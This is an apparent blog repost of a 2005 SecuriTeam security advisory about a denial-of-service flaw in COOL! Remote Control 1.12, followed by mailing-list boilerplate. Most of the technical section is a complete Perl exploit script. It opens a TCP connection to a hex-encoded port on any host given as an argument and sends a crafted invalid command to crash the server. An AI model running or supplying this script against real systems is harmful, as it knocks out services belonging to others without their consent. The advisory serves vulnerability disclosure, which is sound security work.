Search This Blog

Tuesday, September 13, 2005

[NT] COOL! Remote Control DoS

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

COOL! Remote Control DoS
------------------------------------------------------------------------

SUMMARY

" <http://www.yaosoft.com/pcremotecontrol/> COOL! Remote Control is an
excellent remote computing system that is very easy to use. It can display
remote a PC screen on your own PC IN REAL TIME and allow you to use a
mouse or keyboard work on it."

Lack of proper packet validation allows attackers to crash COOL! Remote
Control and cause a DoS.

DETAILS

Vulnerable Systems:
* COOL! Remote Control 1.12

A denial of service condition has been disclosed in the COOL! Remote
Control (server) component that could allow a remote attacker to crash the
service by sending a malicious TCP packet on specific port.

Exploit:
#!usr/bin/perl
#
# COOL! Command Execution DOS Exploit
# --------------------------------------------
# Infam0us Gr0up - Securiti Research
#
# Info: infamous.2hell.com
# Vendor URL: www.yaosoft.com
#
# * If Remote Control(Client application) is running then already
connected to server,
# this command exploit will made Remote Control as Client disconnected
from server machine.
# But if the Remote Control is not currently connected to Remote
Server,then
# by send specified command to Remote Server its allow the server
crashed/closed
#

$ARGC=@ARGV;
if ($ARGC !=1) {
print "Usage: $0 [host]\n";
print "Exam: $0 127.0.0.1\n";
print "\n";
exit;
}
use Socket;

my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$popy = "\x31\x31\x39\x38\x30";

print "\n[+] Connect to host..\n";
$iaddr = inet_aton($remote) or die "[-] Error: $!";
$paddr = sockaddr_in($popy, $iaddr) or die "[-] Error: $!";
$proto = getprotobyname('tcp') or die "[-] Error: $!";

socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "[-] Error: $!";
connect(SOCK, $paddr) or die "[-] Error: $!";

print "[+] Connected\n";
print "[+] Send invalid command..\n";

$empty = "\x49\x4e\x46\x41\x4d\x4f\x55\x531".
"\x47\x52\x4f\x55\x50";

send(SOCK, $empty, 0) or die "[-] Cannot send query: $!";
sleep(2);
print "[+] DONE\n";
print "[+] Check if server crash!\n";
close(SOCK);
exit;

#EoF

ADDITIONAL INFORMATION

The information has been provided by <mailto:basher13@linuxmail.org> Eric
Basher.
The original article can be found at:
<http://k.domaindlx.com/shellcore/advisories.asp?bug_report=display&infamous_group=90> http://k.domaindlx.com/shellcore/advisories.asp?bug_report=display&infamous_group=90

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)